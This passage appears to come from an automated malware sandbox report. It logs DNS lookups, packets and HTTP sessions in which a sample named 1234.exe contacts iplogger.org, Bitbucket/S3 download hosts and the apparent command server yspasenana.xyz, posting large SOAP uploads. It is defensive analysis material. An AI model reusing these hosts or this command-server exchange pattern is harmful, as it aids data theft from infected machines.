                                                                                                                                                                                              Jul 22, 2021 11:37:59.939675093 CEST49717443192.168.2.352.216.94.27
                                                                                                                                                                                              Jul 22, 2021 11:37:59.939721107 CEST49717443192.168.2.352.216.94.27
                                                                                                                                                                                              Jul 22, 2021 11:37:59.940562010 CEST4434971752.216.94.27192.168.2.3
                                                                                                                                                                                              Jul 22, 2021 11:37:59.940587044 CEST4434971752.216.94.27192.168.2.3
                                                                                                                                                                                              Jul 22, 2021 11:37:59.940634966 CEST49717443192.168.2.352.216.94.27
                                                                                                                                                                                              Jul 22, 2021 11:37:59.940665960 CEST49717443192.168.2.352.216.94.27
                                                                                                                                                                                              Jul 22, 2021 11:37:59.957046032 CEST49717443192.168.2.352.216.94.27
                                                                                                                                                                                              Jul 22, 2021 11:37:59.961602926 CEST4434971752.216.94.27192.168.2.3
                                                                                                                                                                                              Jul 22, 2021 11:38:00.028075933 CEST49717443192.168.2.352.216.94.27
                                                                                                                                                                                              Jul 22, 2021 11:38:00.125987053 CEST4434971752.216.94.27192.168.2.3
                                                                                                                                                                                              Jul 22, 2021 11:38:00.126014948 CEST4434971752.216.94.27192.168.2.3
                                                                                                                                                                                              Jul 22, 2021 11:38:00.126024961 CEST4434971752.216.94.27192.168.2.3
                                                                                                                                                                                              Jul 22, 2021 11:38:00.127441883 CEST49717443192.168.2.352.216.94.27
                                                                                                                                                                                              Jul 22, 2021 11:38:00.129054070 CEST49717443192.168.2.352.216.94.27
                                                                                                                                                                                              Jul 22, 2021 11:38:00.340260029 CEST4434971752.216.94.27192.168.2.3
                                                                                                                                                                                              Jul 22, 2021 11:38:00.340316057 CEST4434971752.216.94.27192.168.2.3
                                                                                                                                                                                              Jul 22, 2021 11:38:00.340363979 CEST4434971752.216.94.27192.168.2.3
                                                                                                                                                                                              Jul 22, 2021 11:38:00.340406895 CEST4434971752.216.94.27192.168.2.3
                                                                                                                                                                                              Jul 22, 2021 11:38:00.340456009 CEST4434971752.216.94.27192.168.2.3
                                                                                                                                                                                              Jul 22, 2021 11:38:00.340507984 CEST4434971752.216.94.27192.168.2.3
                                                                                                                                                                                              Jul 22, 2021 11:38:00.340514898 CEST49717443192.168.2.352.216.94.27
                                                                                                                                                                                              Jul 22, 2021 11:38:00.340555906 CEST4434971752.216.94.27192.168.2.3
                                                                                                                                                                                              Jul 22, 2021 11:38:00.340600014 CEST4434971752.216.94.27192.168.2.3
                                                                                                                                                                                              Jul 22, 2021 11:38:00.340610027 CEST49717443192.168.2.352.216.94.27
                                                                                                                                                                                              Jul 22, 2021 11:38:00.340640068 CEST4434971752.216.94.27192.168.2.3
                                                                                                                                                                                              Jul 22, 2021 11:38:00.340677023 CEST4434971752.216.94.27192.168.2.3
                                                                                                                                                                                              Jul 22, 2021 11:38:00.340718031 CEST49717443192.168.2.352.216.94.27
                                                                                                                                                                                              Jul 22, 2021 11:38:00.340723991 CEST4434971752.216.94.27192.168.2.3
                                                                                                                                                                                              Jul 22, 2021 11:38:00.340764999 CEST4434971752.216.94.27192.168.2.3
                                                                                                                                                                                              Jul 22, 2021 11:38:00.340789080 CEST49717443192.168.2.352.216.94.27
                                                                                                                                                                                              Jul 22, 2021 11:38:00.340801954 CEST4434971752.216.94.27192.168.2.3

                                                                                                                                                                                              UDP Packets

                                                                                                                                                                                              TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                              Jul 22, 2021 11:37:49.993918896 CEST53575448.8.8.8192.168.2.3
                                                                                                                                                                                              Jul 22, 2021 11:37:50.714783907 CEST5598453192.168.2.38.8.8.8
                                                                                                                                                                                              Jul 22, 2021 11:37:50.767021894 CEST53559848.8.8.8192.168.2.3
                                                                                                                                                                                              Jul 22, 2021 11:37:51.545605898 CEST6418553192.168.2.38.8.8.8
                                                                                                                                                                                              Jul 22, 2021 11:37:51.599242926 CEST53641858.8.8.8192.168.2.3
                                                                                                                                                                                              Jul 22, 2021 11:37:52.518527985 CEST6511053192.168.2.38.8.8.8
                                                                                                                                                                                              Jul 22, 2021 11:37:52.575964928 CEST53651108.8.8.8192.168.2.3
                                                                                                                                                                                              Jul 22, 2021 11:37:55.356062889 CEST5836153192.168.2.38.8.8.8
                                                                                                                                                                                              Jul 22, 2021 11:37:55.411372900 CEST53583618.8.8.8192.168.2.3
                                                                                                                                                                                              Jul 22, 2021 11:37:56.481718063 CEST6349253192.168.2.38.8.8.8
                                                                                                                                                                                              Jul 22, 2021 11:37:56.531531096 CEST53634928.8.8.8192.168.2.3
                                                                                                                                                                                              Jul 22, 2021 11:37:57.276201963 CEST6083153192.168.2.38.8.8.8
                                                                                                                                                                                              Jul 22, 2021 11:37:57.333133936 CEST53608318.8.8.8192.168.2.3
                                                                                                                                                                                              Jul 22, 2021 11:37:57.757497072 CEST6010053192.168.2.38.8.8.8
                                                                                                                                                                                              Jul 22, 2021 11:37:57.814486980 CEST53601008.8.8.8192.168.2.3
                                                                                                                                                                                              Jul 22, 2021 11:37:58.362932920 CEST5319553192.168.2.38.8.8.8
                                                                                                                                                                                              Jul 22, 2021 11:37:58.424026012 CEST53531958.8.8.8192.168.2.3
                                                                                                                                                                                              Jul 22, 2021 11:37:58.827770948 CEST5014153192.168.2.38.8.8.8
                                                                                                                                                                                              Jul 22, 2021 11:37:58.887105942 CEST53501418.8.8.8192.168.2.3
                                                                                                                                                                                              Jul 22, 2021 11:37:59.534981012 CEST5302353192.168.2.38.8.8.8
                                                                                                                                                                                              Jul 22, 2021 11:37:59.595797062 CEST53530238.8.8.8192.168.2.3
                                                                                                                                                                                              Jul 22, 2021 11:38:00.871737957 CEST4956353192.168.2.38.8.8.8
                                                                                                                                                                                              Jul 22, 2021 11:38:00.924314976 CEST53495638.8.8.8192.168.2.3
                                                                                                                                                                                              Jul 22, 2021 11:38:01.669605970 CEST5135253192.168.2.38.8.8.8
                                                                                                                                                                                              Jul 22, 2021 11:38:01.723066092 CEST53513528.8.8.8192.168.2.3
                                                                                                                                                                                              Jul 22, 2021 11:38:08.691303968 CEST5934953192.168.2.38.8.8.8
                                                                                                                                                                                              Jul 22, 2021 11:38:08.743431091 CEST53593498.8.8.8192.168.2.3
                                                                                                                                                                                              Jul 22, 2021 11:38:10.312644005 CEST5708453192.168.2.38.8.8.8
                                                                                                                                                                                              Jul 22, 2021 11:38:10.364821911 CEST53570848.8.8.8192.168.2.3
                                                                                                                                                                                              Jul 22, 2021 11:38:12.773581028 CEST5882353192.168.2.38.8.8.8
                                                                                                                                                                                              Jul 22, 2021 11:38:12.825656891 CEST53588238.8.8.8192.168.2.3
                                                                                                                                                                                              Jul 22, 2021 11:38:14.909945965 CEST5756853192.168.2.38.8.8.8
                                                                                                                                                                                              Jul 22, 2021 11:38:14.962085962 CEST53575688.8.8.8192.168.2.3
                                                                                                                                                                                              Jul 22, 2021 11:38:16.382057905 CEST5054053192.168.2.38.8.8.8
                                                                                                                                                                                              Jul 22, 2021 11:38:16.433855057 CEST53505408.8.8.8192.168.2.3
                                                                                                                                                                                              Jul 22, 2021 11:38:17.513597012 CEST5436653192.168.2.38.8.8.8
                                                                                                                                                                                              Jul 22, 2021 11:38:17.563263893 CEST53543668.8.8.8192.168.2.3
                                                                                                                                                                                              Jul 22, 2021 11:38:18.926285982 CEST5303453192.168.2.38.8.8.8
                                                                                                                                                                                              Jul 22, 2021 11:38:18.984445095 CEST53530348.8.8.8192.168.2.3
                                                                                                                                                                                              Jul 22, 2021 11:38:20.146954060 CEST5776253192.168.2.38.8.8.8
                                                                                                                                                                                              Jul 22, 2021 11:38:20.196863890 CEST53577628.8.8.8192.168.2.3
                                                                                                                                                                                              Jul 22, 2021 11:38:21.459188938 CEST5543553192.168.2.38.8.8.8
                                                                                                                                                                                              Jul 22, 2021 11:38:21.519318104 CEST53554358.8.8.8192.168.2.3
                                                                                                                                                                                              Jul 22, 2021 11:38:22.303719997 CEST5071353192.168.2.38.8.8.8
                                                                                                                                                                                              Jul 22, 2021 11:38:22.354244947 CEST53507138.8.8.8192.168.2.3
                                                                                                                                                                                              Jul 22, 2021 11:38:26.582389116 CEST5613253192.168.2.38.8.8.8
                                                                                                                                                                                              Jul 22, 2021 11:38:26.644385099 CEST53561328.8.8.8192.168.2.3
                                                                                                                                                                                              Jul 22, 2021 11:38:39.779906034 CEST5898753192.168.2.38.8.8.8
                                                                                                                                                                                              Jul 22, 2021 11:38:39.852066040 CEST53589878.8.8.8192.168.2.3
                                                                                                                                                                                              Jul 22, 2021 11:38:44.697227001 CEST5657953192.168.2.38.8.8.8
                                                                                                                                                                                              Jul 22, 2021 11:38:44.756052017 CEST53565798.8.8.8192.168.2.3
                                                                                                                                                                                              Jul 22, 2021 11:38:55.648947954 CEST6063353192.168.2.38.8.8.8
                                                                                                                                                                                              Jul 22, 2021 11:38:55.717284918 CEST53606338.8.8.8192.168.2.3
                                                                                                                                                                                              Jul 22, 2021 11:38:58.333266973 CEST6129253192.168.2.38.8.8.8
                                                                                                                                                                                              Jul 22, 2021 11:38:58.392389059 CEST53612928.8.8.8192.168.2.3
                                                                                                                                                                                              Jul 22, 2021 11:39:02.829637051 CEST6361953192.168.2.38.8.8.8
                                                                                                                                                                                              Jul 22, 2021 11:39:02.887343884 CEST53636198.8.8.8192.168.2.3
                                                                                                                                                                                              Jul 22, 2021 11:39:07.421799898 CEST6493853192.168.2.38.8.8.8
                                                                                                                                                                                              Jul 22, 2021 11:39:07.485059977 CEST53649388.8.8.8192.168.2.3
                                                                                                                                                                                              Jul 22, 2021 11:39:07.496417999 CEST6194653192.168.2.38.8.8.8
                                                                                                                                                                                              Jul 22, 2021 11:39:07.556369066 CEST53619468.8.8.8192.168.2.3
                                                                                                                                                                                              Jul 22, 2021 11:39:12.173031092 CEST6491053192.168.2.38.8.8.8
                                                                                                                                                                                              Jul 22, 2021 11:39:12.230168104 CEST53649108.8.8.8192.168.2.3
                                                                                                                                                                                              Jul 22, 2021 11:39:12.983562946 CEST5212353192.168.2.38.8.8.8
                                                                                                                                                                                              Jul 22, 2021 11:39:13.041392088 CEST53521238.8.8.8192.168.2.3
                                                                                                                                                                                              Jul 22, 2021 11:39:13.826380968 CEST5613053192.168.2.38.8.8.8
                                                                                                                                                                                              Jul 22, 2021 11:39:13.885869026 CEST53561308.8.8.8192.168.2.3
                                                                                                                                                                                              Jul 22, 2021 11:39:14.621644974 CEST5633853192.168.2.38.8.8.8
                                                                                                                                                                                              Jul 22, 2021 11:39:14.679730892 CEST53563388.8.8.8192.168.2.3
                                                                                                                                                                                              Jul 22, 2021 11:39:14.694097042 CEST5942053192.168.2.38.8.8.8
                                                                                                                                                                                              Jul 22, 2021 11:39:14.753855944 CEST53594208.8.8.8192.168.2.3
                                                                                                                                                                                              Jul 22, 2021 11:39:20.737021923 CEST5878453192.168.2.38.8.8.8
                                                                                                                                                                                              Jul 22, 2021 11:39:20.793726921 CEST53587848.8.8.8192.168.2.3
                                                                                                                                                                                              Jul 22, 2021 11:39:30.741025925 CEST6397853192.168.2.38.8.8.8
                                                                                                                                                                                              Jul 22, 2021 11:39:30.813937902 CEST53639788.8.8.8192.168.2.3
                                                                                                                                                                                              Jul 22, 2021 11:39:33.155277014 CEST6293853192.168.2.38.8.8.8
                                                                                                                                                                                              Jul 22, 2021 11:39:33.215610027 CEST53629388.8.8.8192.168.2.3
                                                                                                                                                                                              Jul 22, 2021 11:39:48.145256996 CEST5570853192.168.2.38.8.8.8
                                                                                                                                                                                              Jul 22, 2021 11:39:48.205405951 CEST53557088.8.8.8192.168.2.3
                                                                                                                                                                                              Jul 22, 2021 11:39:48.225770950 CEST5680353192.168.2.38.8.8.8
                                                                                                                                                                                              Jul 22, 2021 11:39:48.283055067 CEST53568038.8.8.8192.168.2.3

                                                                                                                                                                                              DNS Queries

                                                                                                                                                                                              TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                                                                                                                                                              Jul 22, 2021 11:37:57.757497072 CEST192.168.2.38.8.8.80x6b1fStandard query (0)iplogger.orgA (IP address)IN (0x0001)
                                                                                                                                                                                              Jul 22, 2021 11:37:58.362932920 CEST192.168.2.38.8.8.80x35cStandard query (0)is.gdA (IP address)IN (0x0001)
                                                                                                                                                                                              Jul 22, 2021 11:37:58.827770948 CEST192.168.2.38.8.8.80xc8abStandard query (0)bitbucket.orgA (IP address)IN (0x0001)
                                                                                                                                                                                              Jul 22, 2021 11:37:59.534981012 CEST192.168.2.38.8.8.80x694dStandard query (0)bbuseruploads.s3.amazonaws.comA (IP address)IN (0x0001)
                                                                                                                                                                                              Jul 22, 2021 11:39:02.829637051 CEST192.168.2.38.8.8.80x37fcStandard query (0)yspasenana.xyzA (IP address)IN (0x0001)
                                                                                                                                                                                              Jul 22, 2021 11:39:07.421799898 CEST192.168.2.38.8.8.80x9cbdStandard query (0)api.ip.sbA (IP address)IN (0x0001)
                                                                                                                                                                                              Jul 22, 2021 11:39:07.496417999 CEST192.168.2.38.8.8.80xde65Standard query (0)api.ip.sbA (IP address)IN (0x0001)
                                                                                                                                                                                              Jul 22, 2021 11:39:12.173031092 CEST192.168.2.38.8.8.80x7d8eStandard query (0)yspasenana.xyzA (IP address)IN (0x0001)
                                                                                                                                                                                              Jul 22, 2021 11:39:12.983562946 CEST192.168.2.38.8.8.80x617Standard query (0)yspasenana.xyzA (IP address)IN (0x0001)
                                                                                                                                                                                              Jul 22, 2021 11:39:13.826380968 CEST192.168.2.38.8.8.80xbae6Standard query (0)bitbucket.orgA (IP address)IN (0x0001)
                                                                                                                                                                                              Jul 22, 2021 11:39:14.621644974 CEST192.168.2.38.8.8.80xe505Standard query (0)bbuseruploads.s3.amazonaws.comA (IP address)IN (0x0001)
                                                                                                                                                                                              Jul 22, 2021 11:39:14.694097042 CEST192.168.2.38.8.8.80xfae9Standard query (0)bbuseruploads.s3.amazonaws.comA (IP address)IN (0x0001)
                                                                                                                                                                                              Jul 22, 2021 11:39:20.737021923 CEST192.168.2.38.8.8.80x6d07Standard query (0)yspasenana.xyzA (IP address)IN (0x0001)
                                                                                                                                                                                              Jul 22, 2021 11:39:48.145256996 CEST192.168.2.38.8.8.80xaf28Standard query (0)api.ip.sbA (IP address)IN (0x0001)
                                                                                                                                                                                              Jul 22, 2021 11:39:48.225770950 CEST192.168.2.38.8.8.80x3714Standard query (0)api.ip.sbA (IP address)IN (0x0001)

                                                                                                                                                                                              DNS Answers

                                                                                                                                                                                              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                                                                                                                                                              Jul 22, 2021 11:37:57.814486980 CEST8.8.8.8192.168.2.30x6b1fNo error (0)iplogger.org88.99.66.31A (IP address)IN (0x0001)
                                                                                                                                                                                              Jul 22, 2021 11:37:58.424026012 CEST8.8.8.8192.168.2.30x35cNo error (0)is.gd104.25.233.53A (IP address)IN (0x0001)
                                                                                                                                                                                              Jul 22, 2021 11:37:58.424026012 CEST8.8.8.8192.168.2.30x35cNo error (0)is.gd104.25.234.53A (IP address)IN (0x0001)
                                                                                                                                                                                              Jul 22, 2021 11:37:58.424026012 CEST8.8.8.8192.168.2.30x35cNo error (0)is.gd172.67.83.132A (IP address)IN (0x0001)
                                                                                                                                                                                              Jul 22, 2021 11:37:58.887105942 CEST8.8.8.8192.168.2.30xc8abNo error (0)bitbucket.org104.192.141.1A (IP address)IN (0x0001)
                                                                                                                                                                                              Jul 22, 2021 11:37:59.595797062 CEST8.8.8.8192.168.2.30x694dNo error (0)bbuseruploads.s3.amazonaws.coms3-1-w.amazonaws.comCNAME (Canonical name)IN (0x0001)
                                                                                                                                                                                              Jul 22, 2021 11:37:59.595797062 CEST8.8.8.8192.168.2.30x694dNo error (0)s3-1-w.amazonaws.coms3-w.us-east-1.amazonaws.comCNAME (Canonical name)IN (0x0001)
                                                                                                                                                                                              Jul 22, 2021 11:37:59.595797062 CEST8.8.8.8192.168.2.30x694dNo error (0)s3-w.us-east-1.amazonaws.com52.216.94.27A (IP address)IN (0x0001)
                                                                                                                                                                                              Jul 22, 2021 11:39:02.887343884 CEST8.8.8.8192.168.2.30x37fcNo error (0)yspasenana.xyz212.224.105.105A (IP address)IN (0x0001)
                                                                                                                                                                                              Jul 22, 2021 11:39:07.485059977 CEST8.8.8.8192.168.2.30x9cbdNo error (0)api.ip.sbapi.ip.sb.cdn.cloudflare.netCNAME (Canonical name)IN (0x0001)
                                                                                                                                                                                              Jul 22, 2021 11:39:07.556369066 CEST8.8.8.8192.168.2.30xde65No error (0)api.ip.sbapi.ip.sb.cdn.cloudflare.netCNAME (Canonical name)IN (0x0001)
                                                                                                                                                                                              Jul 22, 2021 11:39:12.230168104 CEST8.8.8.8192.168.2.30x7d8eNo error (0)yspasenana.xyz212.224.105.105A (IP address)IN (0x0001)
                                                                                                                                                                                              Jul 22, 2021 11:39:13.041392088 CEST8.8.8.8192.168.2.30x617No error (0)yspasenana.xyz212.224.105.105A (IP address)IN (0x0001)
                                                                                                                                                                                              Jul 22, 2021 11:39:13.885869026 CEST8.8.8.8192.168.2.30xbae6No error (0)bitbucket.org104.192.141.1A (IP address)IN (0x0001)
                                                                                                                                                                                              Jul 22, 2021 11:39:14.679730892 CEST8.8.8.8192.168.2.30xe505No error (0)bbuseruploads.s3.amazonaws.coms3-1-w.amazonaws.comCNAME (Canonical name)IN (0x0001)
                                                                                                                                                                                              Jul 22, 2021 11:39:14.679730892 CEST8.8.8.8192.168.2.30xe505No error (0)s3-1-w.amazonaws.coms3-w.us-east-1.amazonaws.comCNAME (Canonical name)IN (0x0001)
                                                                                                                                                                                              Jul 22, 2021 11:39:14.679730892 CEST8.8.8.8192.168.2.30xe505No error (0)s3-w.us-east-1.amazonaws.com52.217.80.20A (IP address)IN (0x0001)
                                                                                                                                                                                              Jul 22, 2021 11:39:14.753855944 CEST8.8.8.8192.168.2.30xfae9No error (0)bbuseruploads.s3.amazonaws.coms3-1-w.amazonaws.comCNAME (Canonical name)IN (0x0001)
                                                                                                                                                                                              Jul 22, 2021 11:39:14.753855944 CEST8.8.8.8192.168.2.30xfae9No error (0)s3-1-w.amazonaws.coms3-w.us-east-1.amazonaws.comCNAME (Canonical name)IN (0x0001)
                                                                                                                                                                                              Jul 22, 2021 11:39:14.753855944 CEST8.8.8.8192.168.2.30xfae9No error (0)s3-w.us-east-1.amazonaws.com52.217.80.20A (IP address)IN (0x0001)
                                                                                                                                                                                              Jul 22, 2021 11:39:20.793726921 CEST8.8.8.8192.168.2.30x6d07No error (0)yspasenana.xyz212.224.105.105A (IP address)IN (0x0001)
                                                                                                                                                                                              Jul 22, 2021 11:39:48.205405951 CEST8.8.8.8192.168.2.30xaf28No error (0)api.ip.sbapi.ip.sb.cdn.cloudflare.netCNAME (Canonical name)IN (0x0001)
                                                                                                                                                                                              Jul 22, 2021 11:39:48.283055067 CEST8.8.8.8192.168.2.30x3714No error (0)api.ip.sbapi.ip.sb.cdn.cloudflare.netCNAME (Canonical name)IN (0x0001)

                                                                                                                                                                                              HTTP Request Dependency Graph

                                                                                                                                                                                              • yspasenana.xyz
                                                                                                                                                                                              • 5.149.255.203:32800

                                                                                                                                                                                              HTTP Packets

                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                              0192.168.2.349742212.224.105.10580C:\Users\user\AppData\Roaming\1234.exe
                                                                                                                                                                                              TimestampkBytes transferredDirectionData
                                                                                                                                                                                              Jul 22, 2021 11:39:03.171924114 CEST6697OUTPOST / HTTP/1.1
                                                                                                                                                                                              Content-Type: text/xml; charset=utf-8
                                                                                                                                                                                              SOAPAction: "http://tempuri.org/Endpoint/EnvironmentSettings"
                                                                                                                                                                                              Host: yspasenana.xyz
                                                                                                                                                                                              Content-Length: 144
                                                                                                                                                                                              Expect: 100-continue
                                                                                                                                                                                              Accept-Encoding: gzip, deflate
                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                              Jul 22, 2021 11:39:03.220138073 CEST6697INHTTP/1.1 100 Continue
                                                                                                                                                                                              Jul 22, 2021 11:39:03.332592964 CEST6699INHTTP/1.1 200 OK
                                                                                                                                                                                              Server: nginx
                                                                                                                                                                                              Date: Thu, 22 Jul 2021 09:39:03 GMT
                                                                                                                                                                                              Content-Type: text/xml; charset=utf-8
                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                              Keep-Alive: timeout=3
                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                              Content-Encoding: gzip
                                                                                                                                                                                              Data Raw: 33 65 34 0d 0a 1f 8b 08 00 00 00 00 00 02 03 bd 58 6d 8f e2 36 10 fe 2b 11 d2 4a 2d ba 25 5c b7 dd 9e 10 87 c4 4b d8 a2 2e bb 94 70 7b ad 94 2f c6 19 88 8b e3 89 6c 67 03 ab fb f1 75 42 c2 42 ef b6 2a 31 ad 84 48 3c e3 79 32 1e 8f c7 8f dd 55 1d 4f 3c 03 c7 04 9c 6d cc 85 ea a8 8f 8d 48 eb a4 e3 ba 8a 46 10 13 d5 32 72 85 24 69 a1 5c bb f9 8b 0b a5 85 db e8 75 55 67 80 e1 ae d7 35 28 4c a2 88 41 68 1f b4 66 62 ad e6 a0 12 14 aa 04 3e c0 6a 88 93 54 b2 02 ae f1 96 61 ca 75 e9 0f f9 d8 18 48 cc 14 48 6f ab 41 28 86 a2 51 aa d8 01 33 cb b2 56 76 53 40 fe d0 6e bf 77 7f 9f de fb 85 f7 d7 4c 28 4d 04 05 f3 25 d2 19 70 a4 1b 08 87 98 0a 2d 77 25 ca f2 ab 01 c7 8c 4a 54 b8 d2 2d 8a 71 0e 78 e3 be 6f bb 3e 48 46 38 7b 21 da b8 e0 f6 a5 24 3b d5 70 8f 60 27 b3 8b 21 3e 2e ff 04 aa 7f ec 69 99 42 d7 7d 6d 1f 54 b7 bd 15 e1 ea 48 77 9b eb 7c 4a 44 19 2c 75 b0 3d 11 96 9d 86 91 c4 18 2a e9 8c e8 48 5d c2 f7 5e 77 d9 51 5a 9a 39 ec 5d 7d f2 bd f9 6c fe 38 9e dc 7b 57 41 3f 49 46 44 93 e0 1e 29 e1 c1 80 68 cd a1 25 40 77 dd 83 c1 bf 33 2d 1c 67 69 1c 7c 32 8e 3b b9 e2 6c 88 3b c4 35 87 3d 12 58 e3 7c b7 fd 70 fb bd 0d d8 1c 49 6c b4 c1 63 02 92 38 be 89 73 46 24 04 67 bb 33 25 09 07 5f a7 21 c3 d2 9d 19 4f 95 c5 f8 26 92 85 76 91 fe d9 d7 44 96 ff f5 51 86 a6 32 94 99 6a 83 12 41 88 da 02 e0 89 3d 13 1e 32 0b 84 5f cd 9c 98 46 7d 00 8f 43 5e 26 95 63 1f 0e 2f 61 d4 99 49 33 26 ba bb 00 5c 3a c4 97 29 84 cc 8c 4e 12 61 01 34 06 21 99 74 26 82 06 3e 07 96 08 26 7f 0a d4 7e 5f 08 62 0c 53 0e ea 50 04 9e 18 64 20 cf 4f 05 f3 ca 99 20 77 12 d3 24 18 32 63 81 36 99 85 98 a1 a8 1e f5 71 38 83 25 b1 71 e4 37 b3 01 f9 a9 5c 59 40 3c ca 25 d3 56 6b 7e 88 66 96 30 18 49 b2 b6 8a 46 3f 66 eb 7d 30 2c 40 16 28 69 64 61 ff 07 11 21 6c cb c7 05 6a d0 3e 36 f5 01 6e 6e db 95 17 f6 de 4c c9 56 47 28 6e 6c 2a da f5 d4 10 41 9b 69 f6 93 54 0b b6 39 3c eb 23 3d 30 6a bb a3 0f 91 9a df 05 42 6b 59 04 8b fa 66 97 29 53 c2 78 6b 9e 06 7d 8d 36 ab 79 20 c9 33 1c 38 49 d1 ba be 40 e6 55 8c 32 f0 c2 b5 cd 84 3d 3c 4d 46 93 be 33 44 99 a0 2c 98 68 25 ba 83 b1 59 fb e0 78 5b 43 ab 18 98 03 c0 f9 a9 a9 81 c4 e7 cf 9d dc 25 1a 17 64 f9 cf bb aa fb 26 0f af 28 fa 88 29 8a 32 7c e5 f9 c7 c2 b2 cf 78 31 3b a1 f9 79 bb 52 31 b3 53 9e 2a 0b c9 b1 fa 3f e1 fd a9 19 49 22 71 65 3e 70 15 8c 40 6d 34 26 5f 9a 2d bd d5 ef 9a ad 10 69 f3 5d 73 03 3b f3 9f 11 ce 41 9b 17 05 10 36 bf b4 bf 1d ea 53 38 a4 69 c1 80 ce 06 74 ff 3e ec 2a 10 77 40 37 f8 ff 1f 84 2a d6 3f c5 17 c6 39 09 c6 4c c2 0a b7 35 ce 0d 9f 89 06 59 cf b4 28 df 80 a2 86 e9 22 4a cd 9e 68 d8 82 0c 6b 58 97 1b e1 84 c2 9e 27 d4 80 f8 90 00 dd aa e2 b8 63 08 e1 6e 59 37 06 0f de e2 ae bf f0 9c 05 d0 48 20 c7 35 33 04 73 c0 09 dd fc 42 b2 1a 78 53 44 41 23 c6 43 c3 ae 0d 5d a5 79 56 a8 60 46 38 38 b9 ea 1b 39 f9 75 06 56 b9 e9 53 09 20 4e 16 71 29 aa 3a e4 25 ea b4 42 ec 45 a5 7e 61 a6 77 2d 4d fb 18 e2 20 2c 3b 3d cd 1e 4e 21 72 41 a9 fb 5c 2c a9 d3 3a 52 c9 ba ee 9b 57 37 6f ea 8a fb 20 a3 ad 6e 8d dc d7 eb a7 de 5f e7 f1 c2 3e 8b 12 00 00 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                              Data Ascii: 3e4Xm6+J-%\K.p{/lguBB*1H<y2UO<mHF2r$i\uUg5(LAhfb>jTauHHoA(Q3VvS@nwL(M%p-w%JT-qxo>HF8{!$;p`'!>.iB}mTHw|JD,u=*H]^wQZ9]}l8{WA?IFD)h%@w3-gi|2;l;5=X|pIlc8sF$g3%_!O&vDQ2jA=2_F}C^&c/aI3&\:)Na4!t&>&~_bSPd O w$2c6q8%q7\Y@<%Vk~f0IF?f}0,@(ida!lj>6nnLVG(nl*AiT9<#=0jBkYf)Sxk}6y 38I@U2=<MF3D,h%Yx[C%d&()2|x1;yR1S*?I"qe>p@m4&_-i]s;A6S8it>*w@7*?9L5Y("JhkX'cnY7H 53sBxSDA#C]yV`F889uVS Nq):%BE~aw-M ,;=N!rA\,:RW7o n_>0


                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                              1192.168.2.349744212.224.105.10580C:\Users\user\AppData\Roaming\1234.exe
                                                                                                                                                                                              TimestampkBytes transferredDirectionData
                                                                                                                                                                                              Jul 22, 2021 11:39:12.320914984 CEST6705OUTPOST / HTTP/1.1
                                                                                                                                                                                              Content-Type: text/xml; charset=utf-8
                                                                                                                                                                                              SOAPAction: "http://tempuri.org/Endpoint/SetEnvironment"
                                                                                                                                                                                              Host: yspasenana.xyz
                                                                                                                                                                                              Content-Length: 1151249
                                                                                                                                                                                              Expect: 100-continue
                                                                                                                                                                                              Accept-Encoding: gzip, deflate
                                                                                                                                                                                              Jul 22, 2021 11:39:12.368823051 CEST6705INHTTP/1.1 100 Continue
                                                                                                                                                                                              Jul 22, 2021 11:39:12.916188002 CEST7845INHTTP/1.1 200 OK
                                                                                                                                                                                              Server: nginx
                                                                                                                                                                                              Date: Thu, 22 Jul 2021 09:39:12 GMT
                                                                                                                                                                                              Content-Type: text/xml; charset=utf-8
                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                              Keep-Alive: timeout=3
                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                              Content-Encoding: gzip
                                                                                                                                                                                              Data Raw: 37 65 0d 0a 1f 8b 08 00 00 00 00 00 02 03 45 ce 51 0a 83 40 0c 04 d0 ab c8 1e c0 fc 2f eb 7e 08 bd 80 9e 40 da 50 05 37 09 3b 69 69 6f af 2d b6 fe 0d 03 f3 98 84 78 91 27 af 6a dc bc ca 2a 88 e8 c2 ec 6e 91 08 d7 99 cb 84 76 ef a1 93 b5 5a ef f4 09 c4 c7 82 42 4e 88 bd de de 39 8d ec 3b b4 54 95 c2 e2 03 c3 54 70 98 7f d1 b9 d8 a3 2e 5f 29 50 4e f4 5b d3 79 23 6f 17 76 26 42 93 00 00 00 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                              Data Ascii: 7eEQ@/~@P7;iio-x'j*nvZBN9;TTp._)PN[y#ov&B0


                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                              2192.168.2.349745212.224.105.10580C:\Users\user\AppData\Roaming\1234.exe
                                                                                                                                                                                              TimestampkBytes transferredDirectionData
                                                                                                                                                                                              Jul 22, 2021 11:39:13.094369888 CEST7845OUTPOST / HTTP/1.1
                                                                                                                                                                                              Content-Type: text/xml; charset=utf-8
                                                                                                                                                                                              SOAPAction: "http://tempuri.org/Endpoint/GetUpdates"
                                                                                                                                                                                              Host: yspasenana.xyz
                                                                                                                                                                                              Content-Length: 1151241
                                                                                                                                                                                              Expect: 100-continue
                                                                                                                                                                                              Accept-Encoding: gzip, deflate
                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                              Jul 22, 2021 11:39:13.144042969 CEST7846INHTTP/1.1 100 Continue
                                                                                                                                                                                              Jul 22, 2021 11:39:13.673022032 CEST8989INHTTP/1.1 200 OK
                                                                                                                                                                                              Server: nginx
                                                                                                                                                                                              Date: Thu, 22 Jul 2021 09:39:13 GMT
                                                                                                                                                                                              Content-Type: text/xml; charset=utf-8
                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                              Keep-Alive: timeout=3
                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                              Content-Encoding: gzip
